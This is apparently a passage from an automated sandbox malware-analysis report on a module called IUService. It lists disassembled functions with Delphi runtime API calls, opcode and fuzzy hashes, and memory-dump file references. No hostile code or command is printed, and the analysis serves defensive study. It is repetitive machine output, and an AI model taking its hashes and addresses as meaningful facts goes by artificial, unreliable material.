                                                                                                                                            • Opcode Fuzzy Hash: 131c35e12c0e8e47e1fde943e8facb4ce90f3ede14ba4413e4a48e2dfa573d87
                                                                                                                                            • Instruction Fuzzy Hash: 11212A749056888FEB05CBE8E891AEEB7F5EB58300F40866AE904A3341D7749A058BA1
                                                                                                                                            Function 50016084 Relevance: 15.2, APIs: 10, Instructions: 186COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@LStrAddRef$qqrpv.RTL120 ref: 500160A1
                                                                                                                                            • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500160F4
                                                                                                                                              • Part of subcall function 500089C4: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500089C9
                                                                                                                                            • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 50016157
                                                                                                                                            • CharUpperBuffA.USER32(?,00000100), ref: 500161CB
                                                                                                                                            • @System@@UniqueStringA$qqrr27System@%AnsiStringT$us$i0$%.RTL120(?,00000100), ref: 500161D3
                                                                                                                                            • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(?,00000100), ref: 500161F4
                                                                                                                                            • CharUpperBuffA.USER32(00000000,?,?,00000100), ref: 50016204
                                                                                                                                            • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 50016266
                                                                                                                                            • @System@@EnsureAnsiString$qqrr27System@%AnsiStringT$us$i0$%us.RTL120 ref: 500162A8
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(50016309), ref: 500162FC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$AnsiString$System@%$FromStr$qqrr27StringusSystem@T$us$i0$%x20Unicode$Internal$BuffCharUpper$A$qqrr27Clr$qqrpvEnsureRef$qqrpvString$qqrr27T$us$i0$%T$us$i0$%usUnique
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3754126448-0
                                                                                                                                            • Opcode ID: 1ff42b0232398fc2689e3e5e0853df67aac0a3a8058dbe02572faacc32753696
                                                                                                                                            • Instruction ID: 7aeabf7012fadaf89375e13735e907e93f1881e5daf33cb3c72b493a73839c93
                                                                                                                                            • Opcode Fuzzy Hash: 1ff42b0232398fc2689e3e5e0853df67aac0a3a8058dbe02572faacc32753696
                                                                                                                                            • Instruction Fuzzy Hash: A9718B30A042989FDB25CF68DC917D9B7F5AF45300F5082A6EA58DB242D7B1DEC4CB94
                                                                                                                                            Function 500163C4 Relevance: 15.2, APIs: 10, Instructions: 176COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500165BA), ref: 50016423
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500165BA), ref: 50016472
                                                                                                                                            • @System@@UniqueStringU$qqrr20System@UnicodeString.RTL120(00000000,500165BA), ref: 500164B2
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500165BA), ref: 500164D1
                                                                                                                                            • CharUpperBuffW.USER32(00000000,?,00000000,500165BA), ref: 500164E1
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500165BA), ref: 50016536
                                                                                                                                            • @Character@TCharacter@IsLetterOrDigit$qqrb.RTL120(00000000,500165BA), ref: 50016561
                                                                                                                                            • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,500165BA), ref: 5001656F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: StringUnicode$System@System@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Character@$BuffCharDigit$qqrbEnsureLetterString$qqrr20U$qqrr20UniqueUpper
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 725871508-0
                                                                                                                                            • Opcode ID: aee2499e3083b8a89e48e94aaf61e96d8fcfb8174b222e99395ef528110b3ede
                                                                                                                                            • Instruction ID: 371616eb350b96e3d621023fbff1a77728028cc82446cf9de742119a6f8d3487
                                                                                                                                            • Opcode Fuzzy Hash: aee2499e3083b8a89e48e94aaf61e96d8fcfb8174b222e99395ef528110b3ede
                                                                                                                                            • Instruction Fuzzy Hash: B6616E30A0128A9FDF01CFA8DD816AEB7F6EF44314F608266E904EB255D770DE81CB90
                                                                                                                                            Function 5000A6D4 Relevance: 15.1, APIs: 10, Instructions: 148COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000A88E), ref: 5000A716
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@DynArraySetLength$qqrv.RTL120(?,00000000,5000A88E), ref: 5000A736
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120 ref: 5000A75D
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120 ref: 5000A78A
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120 ref: 5000A7C4
                                                                                                                                            • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120 ref: 5000A83E
                                                                                                                                            • @System@@UStrLen$qqrx20System@UnicodeString.RTL120 ref: 5000A843
                                                                                                                                            • @System@@DynArraySetLength$qqrv.RTL120(00000001), ref: 5000A870
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$Unicode$StringSystem@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$ArrayLength$qqrv$EnsureLen$qqrx20String$qqrr20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4245238830-0
                                                                                                                                            • Opcode ID: af8f6a36bebf27765a23cdc18af7a898d4f77c15dba28067d957638e5394ac34
                                                                                                                                            • Instruction ID: 6d2edc206bd9f8d921c39b7a1cc1f24274515dbb8e96becc019c4f36c3429797
                                                                                                                                            • Opcode Fuzzy Hash: af8f6a36bebf27765a23cdc18af7a898d4f77c15dba28067d957638e5394ac34
                                                                                                                                            • Instruction Fuzzy Hash: 4A518F30E0525ADFEB01DFA8C991AAEB7F1FF45300FA082B5D545A7251E774AE81CB80
                                                                                                                                            Function 5002C4DC Relevance: 15.1, APIs: 10, Instructions: 116COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002C60C,?,?,?,?,?,?,5002C3FA,?,?,?,?,00000000), ref: 5002C518
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @Sysutils@TStringBuilder@set_Length$qqri.RTL120(00000000,5002C60C,?,?,?,?,?,?,5002C3FA,?,?,?,?,00000000), ref: 5002C52D
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002C60C,?,?,?,?,?,?,5002C3FA,?,?,?,?,00000000), ref: 5002C54A
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002C60C,?,?,?,?,?,?,5002C3FA,?,?,?,?,00000000), ref: 5002C572
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120(00000000,5002C60C,?,?,?,?,?,?,5002C3FA,?,?,?,?,00000000), ref: 5002C59B
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002C60C,?,?,?,?,?,?,5002C3FA,?,?,?,?,00000000), ref: 5002C5B8
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002C60C,?,?,?,?,?,?,5002C3FA,?,?,?,?,00000000), ref: 5002C5D7
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120(00000000,5002C60C,?,?,?,?,?,?,5002C3FA,?,?,?,?,00000000), ref: 5002C5F1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$String$AnsiFromStr$qqrr20Stringx27System@%System@@T$us$i0$%Unicode$Internal$Move$qqrpxvpvi$Builder@set_Length$qqriSysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2984213798-0
                                                                                                                                            • Opcode ID: d771aad7a1874d2db2ddaa5cfad2ceeff1fee016059b6d5b291e9fd79e2b5735
                                                                                                                                            • Instruction ID: 068b442feed892b016037b59c515b6d51b768309edcd7f6c8bd425563627ec90
                                                                                                                                            • Opcode Fuzzy Hash: d771aad7a1874d2db2ddaa5cfad2ceeff1fee016059b6d5b291e9fd79e2b5735
                                                                                                                                            • Instruction Fuzzy Hash: 4141BE30701586DF9F11DF78EA8196DB7F6EF8421076483A5E505DB209EB70EE81DB80
                                                                                                                                            Function 50010060 Relevance: 15.1, APIs: 10, Instructions: 107COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001018B), ref: 5001008E
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001018B), ref: 500100AB
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001018B), ref: 500100E3
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,5001018B), ref: 50010114
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,5001018B), ref: 50010119
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001018B), ref: 50010136
                                                                                                                                            • @Character@TCharacter@IsLatin1$qqrb.RTL120(00000000,5001018B), ref: 50010142
                                                                                                                                            • @Character@TCharacter@GetUnicodeCategory$qqrx20System@UnicodeStringi.RTL120(00000000,5001018B), ref: 50010150
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$StringSystem@@$AnsiCharacter@FromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Asg$qqrr20Category$qqrx20Except$qqrvException@$bctr$qqrp20Latin1$qqrbRaiseRecpx14RecxiStringiStringx20Sysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1528459219-0
                                                                                                                                            • Opcode ID: b698632cdc252e54ea1ec76e779071d0cec8955af3992b6e9722cf331ee822e6
                                                                                                                                            • Instruction ID: a458a4b14fff98353ea6486d6640c8d5f1fac8ee108cf368196165f92ca042b4
                                                                                                                                            • Opcode Fuzzy Hash: b698632cdc252e54ea1ec76e779071d0cec8955af3992b6e9722cf331ee822e6
                                                                                                                                            • Instruction Fuzzy Hash: 5931B234A00289ABDF12DFA4DC916AFB7F5AF48300F5042A6E580A7251D7B59EC6C781
                                                                                                                                            Function 5002D3D8 Relevance: 15.1, APIs: 10, Instructions: 90COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@TEncoding@GetUnicode$qqrv.RTL120(00000000,5002D4CE,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 5002D402
                                                                                                                                              • Part of subcall function 5002DF70: @Sysutils@TUnicodeEncoding@$bctr$qqrv.RTL120(00000000,?,5002D407,00000000,5002D4CE,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 5002DF82
                                                                                                                                              • Part of subcall function 5002DF70: InterlockedCompareExchange.KERNEL32(500A6CA4,00000000,00000000), ref: 5002DF92
                                                                                                                                              • Part of subcall function 5002DF70: @System@TObject@Free$qqrv.RTL120(00000000,?,5002D407,00000000,5002D4CE,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 5002DF9D
                                                                                                                                              • Part of subcall function 5002D37C: @System@@DynArrayLength$qqrv.RTL120 ref: 5002D38D
                                                                                                                                              • Part of subcall function 5002D37C: @System@@DynArrayLength$qqrv.RTL120 ref: 5002D396
                                                                                                                                              • Part of subcall function 5002D37C: @System@@DynArrayLength$qqrv.RTL120 ref: 5002D3A1
                                                                                                                                            • @Sysutils@TEncoding@GetUnicode$qqrv.RTL120(?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 5002D41D
                                                                                                                                            • @Sysutils@TEncoding@GetBigEndianUnicode$qqrv.RTL120(?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 5002D426
                                                                                                                                            • @Sysutils@TEncoding@GetBigEndianUnicode$qqrv.RTL120(?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 5002D441
                                                                                                                                            • @System@@DynArrayLength$qqrv.RTL120(?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 5002D482
                                                                                                                                            • @System@@DynArrayLength$qqrv.RTL120(?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 5002D4A6
                                                                                                                                            • @System@@FinalizeArray$qqrpvt1ui.RTL120(5002D4D5,?,00000000,00000000,00000000,00000000,00000000), ref: 5002D4C8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$ArrayLength$qqrvSysutils@$Encoding@Unicode$qqrv$Endian$Array$qqrpvt1uiCompareEncoding@$bctr$qqrvExchangeFinalizeFree$qqrvInterlockedObject@System@Unicode
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 84035370-0
                                                                                                                                            • Opcode ID: adccd838f023833192a6ea8ef32ba18dfceb28250b807702a089e8f6cb3e4738
                                                                                                                                            • Instruction ID: 039153d2115dfd61d257ebf5085e828ad7449732c8b2836f1213e2f1a0251a10
                                                                                                                                            • Opcode Fuzzy Hash: adccd838f023833192a6ea8ef32ba18dfceb28250b807702a089e8f6cb3e4738
                                                                                                                                            • Instruction Fuzzy Hash: 7E31AC745029869FDB04FFA0F49156DB3B5EF99310B2042A7F8019B355DB30AD03DAE2
                                                                                                                                            Function 5002BA88 Relevance: 15.1, APIs: 10, Instructions: 89COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002BB82), ref: 5002BAC9
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,00000000,5002BB82), ref: 5002BAF8
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,5002BB82), ref: 5002BAFD
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,00000000,5002BB82), ref: 5002BB20
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,5002BB82), ref: 5002BB25
                                                                                                                                            • @Sysutils@TStringBuilder@set_Length$qqri.RTL120(00000000,5002BB82), ref: 5002BB31
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002BB82), ref: 5002BB4E
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120(00000000,5002BB82), ref: 5002BB67
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$String$System@@$AnsiFromStr$qqrr20Stringx27System@%Sysutils@T$us$i0$%Unicode$Except$qqrvException@$bctr$qqrp20InternalRaiseRecpx14Recxi$Builder@set_Length$qqriMove$qqrpxvpvi
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2643269361-0
                                                                                                                                            • Opcode ID: 0708b84ccf3e92e627d5ed3dd2509e173c6bcd433ac113f8520e2423efd052c3
                                                                                                                                            • Instruction ID: 9b41787f5445ca965e8b445f3d3e889d29c8efd9642bd8e15586ab18e8b0b9b5
                                                                                                                                            • Opcode Fuzzy Hash: 0708b84ccf3e92e627d5ed3dd2509e173c6bcd433ac113f8520e2423efd052c3
                                                                                                                                            • Instruction Fuzzy Hash: 1931A430A011869FDB11DFA8ED91AADB7F9EF94304F54C2A6E50097256DB70EE04CBD0
                                                                                                                                            Function 500275A0 Relevance: 15.1, APIs: 10, Instructions: 77COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50027676), ref: 500275C8
                                                                                                                                            • @System@UniqueString$qqrr20System@UnicodeString.RTL120(00000000,50027676), ref: 500275D0
                                                                                                                                              • Part of subcall function 5000AAF8: @System@@NewUnicodeString$qqri.RTL120(?,5000A544), ref: 5000AAC6
                                                                                                                                              • Part of subcall function 5000AAF8: @System@Move$qqrpxvpvi.RTL120(00000000,?,5000A544), ref: 5000AAD7
                                                                                                                                              • Part of subcall function 5000AAF8: @System@@FreeMem$qqrpv.RTL120(?,5000A544), ref: 5000AAEC
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50027676), ref: 500275DC
                                                                                                                                            • GetFileVersionInfoSizeW.VERSION(00000000,?,00000000,50027676), ref: 500275E2
                                                                                                                                            • @System@@GetMem$qqri.RTL120(00000000,?,00000000,50027676), ref: 500275EF
                                                                                                                                              • Part of subcall function 50003FB0: @System@SysGetMem$qqri.RTL120 ref: 50003FB4
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,?,00000000,50027659,?,00000000,?,00000000,50027676), ref: 50027611
                                                                                                                                            • GetFileVersionInfoW.VERSION(00000000,?,00000000,?,00000000,50027659,?,00000000,?,00000000,50027676), ref: 50027617
                                                                                                                                            • VerQueryValueW.VERSION(?,50027688,?,?,00000000,?,00000000,?,00000000,50027659,?,00000000,?,00000000,50027676), ref: 50027631
                                                                                                                                            • @System@@FreeMem$qqrpv.RTL120(50027660,?,00000000,50027659,?,00000000,?,00000000,50027676), ref: 50027653
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
